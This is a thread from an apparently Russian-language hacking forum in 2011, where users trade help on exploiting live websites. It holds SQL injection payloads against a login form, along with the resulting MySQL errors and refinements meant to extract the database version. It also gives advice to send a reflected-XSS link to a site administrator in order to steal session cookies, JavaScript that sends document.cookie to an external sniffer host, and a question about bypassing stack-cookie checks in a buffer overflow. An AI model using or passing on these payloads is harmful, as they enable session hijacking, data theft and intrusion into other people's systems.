Ваши вопросы по уязвимостям.

12.08.2011, 12:16

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

прошу помочь с скулем не могу раскрутит

Код:

https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')

Код:

POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')

Код:

POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')

тока email=eeee%40eeeee.ee&signinfrom=private&password= pppppp' or 'x'='x норм отображается но order by не катет

12.08.2011, 12:19

ridik77

Новичок

Регистрация: 09.08.2011

Сообщений: 5

С нами: 7768406

Репутация: 0

подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт ">alert(/xss/) дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\">al ert(/xss/) подскажите что дальше?

12.08.2011, 13:16

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от ridik77

Это дело называется пасивная XSS, ты можешь поставить где нить снифер, и подсунуть ссылку админу

ххх.com/?a=login&say=invalid_login&username=\\">document.l ocation="SNIFFER"+document.cookie за счет чего получишь админские куки и если повезет сможешь под его куками войти в админку

12.08.2011, 13:28

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

С нами: 8982831

Репутация: 37

Цитата:

Сообщение от YuNi|[c

прошу помочь с скулем не могу раскрутит

Код:

https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'

Код:

POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'

Код:

POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
тока email=eeee%40eeeee.ee&signinfrom=private&password= pppppp' or 'x'='x норм отображается но order by не катет

Код:

email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x

Так попробуй (только не забудь удалить пробелы, которые форум подставляет)

12.08.2011, 13:38

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

Цитата:

Сообщение от ZARO

Код:

email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x

Так попробуй (только не забудь удалить пробелы, которые форум подставляет)

There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1) or 'x'='x' AND (c.password is not null AND c.password != '')

спс не подходит чет стукнул в пм

12.08.2011, 13:50

ridik77

Новичок

Регистрация: 09.08.2011

Сообщений: 5

С нами: 7768406

Репутация: 0

winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-

img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;

и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')

куда и как подставлять? куки должны сразу прейти или надо ждать?

12.08.2011, 13:57

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

YuNi|[c, во первых - раз у тебя данные передаются _POST методом, то символ плюс (+) использовать не нужно, т.к. это аналог пробела, и в твоем случае этот символ попадает так как есть.

во-вторых в конце обязательно нужен комментарий, в качестве которого достаточно использовать символ решетки (#)

в-третьих попробуй так:

Код:

email=a@a.com&signinfrom=private&password=x'or(select(max(1))from(customer)group by(concat(version(),0x00,floor(rand(0)*2))))#

#10

12.08.2011, 14:09

herfleisch

Участник форума

Регистрация: 07.01.2009

Сообщений: 237

С нами: 9126697

Репутация: 97

Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:

Код:

call __security_check_cookie

Есть ли способы её обойти?

Windows XP

Внести депозит

Депозит создан

Вывести депозит